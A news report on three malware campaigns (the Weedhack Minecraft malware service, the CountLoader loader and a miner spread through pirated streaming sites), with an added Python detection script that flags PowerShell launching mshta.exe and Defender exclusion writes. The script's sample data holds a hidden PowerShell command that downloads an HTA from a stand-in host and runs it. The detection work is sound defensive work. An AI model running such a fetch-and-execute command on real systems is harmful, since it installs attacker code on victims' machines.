Weedhack Attacks Minecraft Users, CountLoader Hits 86K, Miners Spread via Pirated Content

The Hacker News by The Hacker News
June 3, 2026
Cybersecurity researchers have flagged a new campaign targeting Minecraft players via YouTube to spread malware capable of gaining control of victims’ systems.

The Minecraft-focused malware-as-a-service (MaaS) campaign has been codenamed Weedhack by McAfee Labs, which said the activity has been ongoing since January 2026 and impersonates Minecraft clients and mods to infect users. In all, 3,820 unique malicious JAR files and more than 240 URLs responsible for distributing the malware have been identified.

“This campaign utilizes SEO poisoning and YouTube to generate traffic to these malicious URLs,” security researcher Aayush Tyagi said. “We also found two YouTube channels and multiple videos that demonstrate Minecraft Mods and Clients and redirect viewers to these URLs.”

Central to the campaign is an enterprise-grade dashboard (“weedhack[.]to”) that enables customers to view stolen credentials and system information, as well as remotely keep tabs on the compromised systems. Furthermore, it allows criminals to create custom payloads that target Minecraft versions 1.21.0 to 1.21.11 and to inject the malware into legitimate Minecraft mods.

The starting point of the attack is a malicious JAR file (“DonutDupe.jar”) downloaded from the malicious websites. The file then retrieves details of the command-and-control (C2) server domain using a known technique called EtherHiding, which employs the Ethereum blockchain as a dead drop resolver.

In the next stage, the malware contacts the C2 server to fetch another Java-based JAR payload (“Elevator.jar”) that collects system information, configures Microsoft Defender exclusions, and serves as a conduit for dropping two additional JAR payloads. The third JAR payload (“SecurityManager.jar”) establishes persistence and acts as a stager for the final component (“Component.jar”) that deploys the remote access features.

The threat actors behind the tooling leverage a Telegram channel to advertise their warez, broadcast updates, and provide customer support. The channel has more than 850 members. The tool, for its part, comes in two tiers –

  • Free, which includes a comprehensive infostealer that can target Minecraft session IDs and four Minecraft launchers; capture screenshots; and harvest files, system information, cookies, and passwords from 36 different web browsers, data from 56 browser-based cryptocurrency wallets and 12 desktop wallet apps, and credentials for Discord, Steam, and Telegram.
  • Premium, which starts at $4.99 per month (or $24.99 for a lifetime license) and offers additional remote access capabilities, such as webcam access, keylogging, reverse shell execution, screen sharing with keyboard and mouse access, and file uploads and downloads.

Attack chains revolve around SEO poisoning and YouTube videos containing descriptions that embed links to malicious Minecraft Clients to target unsuspecting users. The majority of Weedhack infections have been identified in the U.S., followed by Germany, India, the U.K., Italy, Vietnam, Canada, Norway, Sweden, Finland, and Spain.

“One of the key features that makes Weedhack unique is that it is hosted on the clear net and provides access to sophisticated malware for free,” Tyagi said. “This difference in cost and ease of access with detailed tutorials on how to use the malware significantly reduces the barrier to entry for prospective customers. Furthermore, its ability to steal Minecraft accounts attracts a younger audience. Both of these factors complement each other and make the campaign much more lethal.”

McAfee Labs said it has also observed the malware acting as a trigger for cyberbullying, where the customers, who appear to be teenagers and young adults, weaponize its remote access capabilities to threaten, harass, and monitor their victims. Customers have recorded victims via their webcams and shared the videos on the Telegram channel as “trophies.”

CountLoader Delivers Crypto Clipper

The disclosure comes as the cybersecurity company sheds light on a large-scale CountLoader campaign that’s estimated to have compromised 86,000 unique machines. CountLoader is a JavaScript loader that’s typically distributed via cracked software distribution sites. It’s known to deploy various payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner.

Of these compromises, approximately 9,000 infections are said to have resulted from the malware spreading via USB drives and removable media. McAfee Labs said the highest number of infections was observed in India, followed by Indonesia, the U.S., and several countries across Southeast Asia, adding it was able to successfully sinkhole the malware communication infrastructure by registering a fake C2 domain.

“The infection begins when an EXE file is executed,” the company said. “This file launches a PowerShell command, which downloads and executes an obfuscated JavaScript loader known as CountLoader. The loader is executed using ‘mshta.exe.’”

Once executed, CountLoader sets up persistence, communicates with the C2 server, attempts to spread via USB drives, and awaits further instructions from the C2 server to download and execute payloads. The final payload deployed in the latest set of attacks is a cryptocurrency clipper malware that hijacks clipboard content to redirect cryptocurrency transactions.

Pirated Content Leads to Cryptocurrency Miners

The findings also follow the discovery of a years-long campaign that has used illegal movie and TV show streaming sites to distribute a cryptocurrency miner under the guise of a fake update for a video player plugin. The bogus update downloads a ZIP archive, which then uses DLL side-loading to drop a fork of SilentCryptoMiner.

The malware is equipped with a wide range of capabilities –

  • Configure Defender exclusions, terminate Microsoft’s Malicious Software Removal Tool, and disable automatic hibernation and sleep mode to maximize the miner’s potential runtime on the device.
  • Repeatedly trigger User Account Control (UAC) prompts until the process is successfully executed with elevated privileges.
  • Initiate a watchdog component that ensures the uninterrupted operation of the miner.
  • Run a RAT agent that provides remote control capabilities, including running arbitrary commands, launching EXE files using “explorer.exe,” and running shellcode.
  • Launch an XMRig-based CPU and a GPU miner.
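As an added example (not part of The Hacker News article, and not code from McAfee Labs or Kaspersky), the following Python script shows detection logic a defender could run over process-creation and registry-write telemetry (in the style of Sysmon Event ID 1 and Event ID 13) for two behaviours the article describes: the CountLoader chain, in which a dropped EXE launches PowerShell that downloads a script and runs it through mshta.exe, and the writing of Microsoft Defender exclusions, which both Weedhack's Elevator.jar and the miner dropper are reported to do. Every event record, path, PID and URL below is constructed sample data, and the flat field layout is a simplifying assumption rather than any vendor's schema.

```python
"""Detection logic over constructed process and registry events.

Two rules are implemented:
  1. script_host_from_powershell: mshta.exe (or wscript/cscript) spawned by
     PowerShell; severity is raised when the PowerShell command line shows a
     download and when the grandparent is an EXE run from a user-writable path.
  2. defender_exclusion_write: a registry write under the Windows Defender
     Exclusions keys, which is the setting change an attacker makes to keep a
     payload out of Defender's view.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:          # simplified stand-in for a Sysmon EID 1 record
    pid: int
    parent_pid: int
    image: str
    command_line: str


@dataclass
class RegistryEvent:         # simplified stand-in for a Sysmon EID 13 record
    pid: int
    image: str
    target_object: str


SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Heuristic markers of a download inside a PowerShell one-liner (assumption).
DOWNLOAD_RE = re.compile(
    r"https?://|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)
DEFENDER_EXCLUSION_RE = re.compile(
    r"\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_loader_chain(events):
    """Return findings for script hosts launched by PowerShell, walking the
    parent chain (EXE -> powershell.exe -> mshta.exe) by PID."""
    by_pid = {ev.pid: ev for ev in events}
    findings = []
    for ev in events:
        if basename(ev.image) not in SCRIPT_HOSTS:
            continue
        shell = by_pid.get(ev.parent_pid)
        if shell is None or basename(shell.image) not in SHELLS:
            continue               # mshta.exe from explorer.exe etc. is not flagged
        finding = {"rule": "script_host_from_powershell", "pid": ev.pid,
                   "chain": [basename(shell.image), basename(ev.image)],
                   "severity": "medium"}
        if DOWNLOAD_RE.search(shell.command_line):
            finding["severity"] = "high"
        dropper = by_pid.get(shell.parent_pid)
        if dropper is not None and USER_WRITABLE_RE.search(dropper.image):
            finding["chain"].insert(0, basename(dropper.image))
            finding["severity"] = "high"
        findings.append(finding)
    return findings


def detect_defender_exclusions(events):
    """Return findings for writes under the Defender Exclusions registry keys."""
    findings = []
    for ev in events:
        m = DEFENDER_EXCLUSION_RE.search(ev.target_object)
        if m:
            findings.append({"rule": "defender_exclusion_write", "pid": ev.pid,
                             "image": basename(ev.image),
                             "exclusion_type": m.group(1).lower(),
                             "value": ev.target_object[m.end():]})
    return findings


# Constructed sample telemetry (not real data): a CountLoader-style chain plus
# a benign mshta.exe launch, and a Java process adding a Defender path exclusion.
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(2100, 100, r"C:\Users\alice\Downloads\Setup_Crack.exe", '"Setup_Crack.exe"'),
    ProcessEvent(2101, 2100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "iwr http://loader.example.invalid/c.hta '
                 '-OutFile $env:TEMP\\c.hta; mshta $env:TEMP\\c.hta"'),
    ProcessEvent(2102, 2101, r"C:\Windows\System32\mshta.exe",
                 r"mshta C:\Users\alice\AppData\Local\Temp\c.hta"),
    ProcessEvent(2200, 100, r"C:\Windows\System32\mshta.exe", r"mshta C:\Tools\helpdesk.hta"),
]
SAMPLE_REGISTRY_EVENTS = [
    RegistryEvent(3100, r"C:\Program Files\Java\jre\bin\java.exe",
                  r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
                  r"\C:\Users\alice\AppData\Roaming\.minecraft"),
    RegistryEvent(3101, r"C:\Windows\explorer.exe",
                  r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"),
]


def run_detections(process_events, registry_events):
    """Run both rules and return all findings in one list."""
    return detect_loader_chain(process_events) + detect_defender_exclusions(registry_events)


if __name__ == "__main__":
    for f in run_detections(SAMPLE_PROCESS_EVENTS, SAMPLE_REGISTRY_EVENTS):
        print(f)
```

The parent-chain walk is what separates the loader pattern from routine use of mshta.exe: a help-desk HTA double-clicked from Explorer produces no finding, while the same binary under PowerShell with a download in the command line does. The exclusion rule keys on the registry write itself because it is independent of which process made it; Defender's own operational log also records configuration changes, which can serve as a second source for the same signal.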

“The archive contained a legitimate executable, HLS Installer.874.exe, alongside a malicious DLL. Launching the EXE triggered a DLL side-loading mechanism, injecting the malicious module into a legitimate program process and executing code within its context,” Kaspersky said. “The library contained the logic for deploying the miner and establishing persistence on the device.”

It’s assessed that the activity is a continuation of a campaign that was documented by NTT Security in April 2023, which used fake browser crash warnings to drop the miner.

“The threat actors leverage a variety of sites, ranging from online libraries to movie and TV show streaming platforms,” Kaspersky said. “There is no telling what channels they will use to distribute the malicious archive in the future. However, the current case shows that users visiting pirated websites continue to take a serious risk.”